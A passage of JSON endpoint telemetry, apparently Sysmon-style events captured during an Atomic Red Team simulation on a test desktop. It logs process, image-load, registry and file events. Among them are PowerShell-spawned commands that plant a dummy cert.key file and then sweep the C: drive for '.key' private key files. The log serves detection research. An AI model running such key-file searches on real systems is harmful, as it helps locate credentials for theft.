"{42FC7E13-B282-5C05-0000-0010EB030000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "destination_address": "192.168.162.134", - "destination_port": "137", - "event_type": "network", - "pid": 4, - "process_name": "System", - "process_path": "System", - "protocol": "udp", - "source_address": "192.168.162.255", - "source_port": "137", - "subtype": "incoming", - "timestamp": 131883570966190000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "image_load", - "image_name": "winhttp.dll", - "image_path": "C:\\Windows\\System32\\winhttp.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "OnDemandConnRouteHelper.dll", - "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\WINDOWS\\system32\\net.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "dhcpcsvc6.dll", - "image_path": "C:\\Windows\\System32\\dhcpcsvc6.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "dhcpcsvc.dll", - "image_path": "C:\\Windows\\System32\\dhcpcsvc.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\WINDOWS\\system32\\net.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "webio.dll", - "image_path": "C:\\Windows\\System32\\webio.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989020000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "dnsapi.dll", - "image_path": "C:\\Windows\\System32\\dnsapi.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\WINDOWS\\system32\\net.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570989180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\WINDOWS\\system32\\net.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570989180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\WINDOWS\\system32\\net.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570989180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\WINDOWS\\system32\\net.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570989180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\WINDOWS\\system32\\net.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570989180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "image_load", - "image_name": "rasadhlp.dll", - "image_path": "C:\\Windows\\System32\\rasadhlp.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570989180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\WINDOWS\\system32\\net.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570989180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\WINDOWS\\system32\\net.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570989180000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "file", - "file_name": "NET.EXE-1DF3A2F6.pf", - "file_path": "C:\\Windows\\Prefetch\\NET.EXE-1DF3A2F6.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883571010740000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "process", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "subtype": "terminate", - "timestamp": 131883571011680000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "process", - "pid": 7556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571011680000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" - }, - { - "event_type": "process", - "pid": 2260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571011680000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2812, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571011820000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2812, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571011680000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2812, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571011680000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2812, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571011830000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2812, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571011830000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2812, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571011830000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" - }, - { - "event_type": "process", - "pid": 2812, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571011830000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"echo \" \"ATOMICREDTEAM > %%windir%%\\cert.key\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3668, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571013970000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3668, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571013860000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3668, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571013860000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3668, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571013860000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3668, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571013860000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3668, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571013860000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" - }, - { - "event_type": "file", - "file_name": "cert.key", - "file_path": "C:\\Windows\\cert.key", - "pid": 3668, - "process_name": "cmd.exe", - "process_path": "C:\\WINDOWS\\system32\\cmd.exe", - "timestamp": 131883571014020000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" - }, - { - "event_type": "process", - "pid": 3668, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571014020000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7132, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571014100000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014020000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014020000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014020000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014020000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014020000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" - }, - { - "command_line": "C:\\WINDOWS\\system32\\cmd.exe /S /D /c\" dir c:\\ /b /s .key \"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5508, - "ppid": 7132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}", - "unique_ppid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5508, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5508, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5508, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5508, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" - }, - { - "command_line": "findstr /e .key", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1376, - "ppid": 7132, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "subtype": "create", - "timestamp": 131883571014230000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}", - "unique_ppid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5508, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571014330000, - "unique_pid": 